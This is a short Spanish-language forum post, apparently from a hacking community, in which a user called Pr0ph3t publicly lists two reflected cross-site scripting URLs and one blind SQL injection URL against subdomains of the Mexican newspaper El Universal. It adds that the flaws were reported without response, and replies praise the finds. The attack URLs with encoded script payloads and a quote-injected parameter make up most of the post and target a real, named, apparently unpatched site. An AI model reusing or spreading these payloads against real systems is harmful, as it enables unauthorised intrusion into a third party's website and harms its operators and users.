(http://i.imgur.com/aRiKc9Q.jpg)
XSS 1: http://fotos.eluniversal.com.mx/fotogaleria/w_foto.html?p_nombre=/img/2012/12/hom/barack_obama_hawai_1.jpg&p_fotografo=%22%3E%3Cscript%3Ealert%28/Pr0ph3t/.source%29%3C/script%3EAP
XSS 2: http://historico.eluniversal.com.mx/search/index.php?q=%22%3E%3Cscript%3Ealert%28%2FPr0ph3t%2F%29%3C%2Fscript%3E&x=12&y=11
Blind SQLi: http://fotos.eluniversal.com.mx/coleccion/muestra_fotogaleria.html?idgal='14398
Autor: Pr0ph3t
Reportado: Sí, pero sin respuesta.
Buena.
Saludos.
Excelente! Muy buena, y le has sacado varias vulnerabilidades :)
Saludos,, Cronos.-